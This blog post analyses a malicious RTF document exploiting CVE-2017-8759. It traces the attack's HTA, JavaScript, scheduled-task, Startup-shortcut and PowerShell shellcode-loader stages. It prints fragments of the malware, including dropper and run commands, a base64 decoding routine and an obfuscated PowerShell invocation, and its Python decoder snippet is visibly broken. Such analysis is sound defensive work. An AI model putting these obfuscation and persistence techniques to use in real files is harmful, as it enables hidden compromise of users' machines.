Wednesday, 20 September 2017

RTF based Variant of CVE-2017-8759 - Multiple Layers of Obfuscation

Recently, I observed an RTF file exploiting CVE-2017-8759 vulnerability. The vulnerability is in the way SOAP WSDL files are handled by MS Office Winword. This file was particularly interesting to analyze for several reasons. The main reasons being:

1. This is an RTF variant of a Document (shown in Figure 1) exploiting CVE-2017-8759. So far the variants observed in the wild were related to Doc/XLS/PPT file formats only.
2. It downloads the SOAP WSDL file over FTP instead of HTTP. Of course, it could be any protocol as long as the SOAP WSDL file is downloaded and processed by MS Office Winword.
3. The number of layers of obfuscations in the attack chain made it very interesting to analyze and so I decided to do a writeup.

Figure 1

Extracting the OLE object from RTF and identifying the WSDL component

The RTF document in this case performs a network request as soon as it is opened with Winword. However, there is no embedded object or shellcode inside the document. So, we need to inspect it further to understand the source of this network request.

We can use rtfobj from oletools to extract the OLE object. Once we have extracted the OLE object from RTF file using rtfobj, we can open it with OffVis to inspect it in more details. In the hex view, we can observe the following wsdl URL:

wsdl =

In Figure 2, we can see the FTP URL in hex view as well as the content downloaded from this URL.

Figure 2

In the next step, the HTA file will be downloaded and processed by mshta in the context of Word Application from the URL:

In Figure 3, we can see the HTA file being downloaded.

Figure 3

The HTA file will drop 2 JavaScript files in the %temp% directory as shown below:

liuyaihatif520 = OWSDSAmDSAceGFDSeio43DSAV1.ExpandEnvironmentStrings("%temp%") & "/6jSaWOr^rWug5n0PHUFjDFyb8k.js"
liuyaihatif522 = OWSDSAmDSAceGFDSeio43DSAV1.ExpandEnvironmentStrings("%temp%") & "/P7kowB7klgonCDmtRLZUQmcJ.js"

It will execute both the files and then kill the running instance of mshta.exe process as shown below:

OWSDSAmDSAceGFDSeio43DSAV1.Run liuyaihatif520, True
OWSDSAmDSAceGFDSeio43DSAV1.Run liuyaihatif522, True
OWSDSAmDSAceGFDSeio43DSAV1.Run "taskkill /im mshta.exe /f", True

Let's look at the contents of each JavaScript now:

The contents of 6jSaWOr^rWug5n0PHUFjDFyb8k.js are as shown in Figure 4.

Figure 4

It stores the next stage JavaScript base64 encoded inside an XML as shown below:

<root><file><stream xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="bin.base64">dmFyIEJy ....

And these contents are decoded using the following code:

var ws = new ActiveXObject("WScript.Shell");
var objXmlFile = new ActiveXObject("Microsoft.XMLDOM");
objXmlFile.async = false;
do {
} while (!objXmlFile.readyState == 4) if (objXmlFile.readyState == 4) {
    var objStream = new ActiveXObject("ADODB.Stream");
    var objNodeList = objXmlFile.getElementsByTagName("stream")[0].nodeTypedValue;
    with(objStream) {
        objStream.Type = 1;

This technique was used multiple times in the attack chain. Now, the base64 decoded JavaScript is written to the file in path: %ALLUSERSPROFILE%\rWug5n0PHUFjDFyb8k.js and then executed.

Let's analyze the next stage JavaScript shown in Figure 5.

Figure 5

It has hex encoded the strings and after decoding, we can see that it executes a sequence of commands using Run method of WScript.Shell as shown in Figure 6.

Figure 6

The first command sets a Scheduled Task with the name, JAVAClient which will execute the JavaScript in the path: C:\ProgramData\DSAFDSau123FDS.js using wscript every day at timestamp 10:00:00

The second command will execute a Powershell Script which is obfuscated as well.

Let's look at the Powershell Script now. The Powershell script is easy to deobfuscate once we analyze the following code:

" "$( sEt-iTEM  'VariABlE:oFs'  '')"+ [stRing]('24,73u3dG4e<65,77-2dG4fG62&6a,....{3b'-spLIT ','-SPlIT '&'-spLIt 'R' -spLIT'G' -SpliT '{'-SPLiT 'u'-SpLIt '-'-sPliT'<'|FoREaCH {( [CHar]( [cOnveRT]::tOINT16( ( $_.TOSTRInG()),16) )) } )+"$(sEt-VARiABlE 'oFS'  ' ') "|& ( $SHElLiD[1]+$sHeLLid[13]+'X')"

The entire PowerShell code is hex encoded with random characters inserted in between which will be removed later.

So, we can extract the long hex encoded string and then remove the characters: ',', '&', 'R', 'G', '{', 'u', '-', '<'

Store the resulting hex encoded string in a file and decode it using a simple Python script:

#! /usr/bin/python

import sys

with open(sys.argv[1], 'rb') as f:
    decoded ='hex')

print decoded

The next layer of the Powershell Script is as shown in Figure 7.

Figure 7

We can decode it by base64 decoding and Gzip decompressing the resulting output.

This gives us another layer of Powershell script as shown in Figure 8.

Figure 8

This Powershell script stores the shellcode base64 encoded. It's a Powershell based Shellcode Loader. It base64 decodes it, allocates memory using VirtualAlloc(), writes the shellcode to this memory region and executes it in a new Thread.

We can manually base64 decode the string and load the resulting shellcode in IDA Pro. Shellcode is as shown in Figure 9.

Figure 9

Once we debug the Shellcode, we can see that it downloads the data from the URL: using HttpSendRequest() as shown in Figure 10.

Figure 10

Now let's analyze the 2nd JavaScript file, P7kowB7klgonCDmtRLZUQmcJ.js which was dropped and executed by the HTA file as mentioned before.

This JavaScript file will base64 decode and drop another JavaScript in the path: %temp%\link.js

The link.js file is as shown in Figure 11.

Figure 11

As can be seen in the code above, it will drop an LNK file (with the name, Java(TM) Platform SE Auto Updater.lnk) in the Startup folder and set the Target field of the LNK to the JS Path: %ALLUSERSPROFILE%\rWug5n0PHUFjDFyb8k.js. As a result of this, each time the system is restarted, the JavaScript will spawn Powershell which loads the shellcode and performs further malicious activities.

These multiple layers of obfuscation are a good example of how attackers try to hide the actual malicious code and prevent analysis.

No comments:

Post a Comment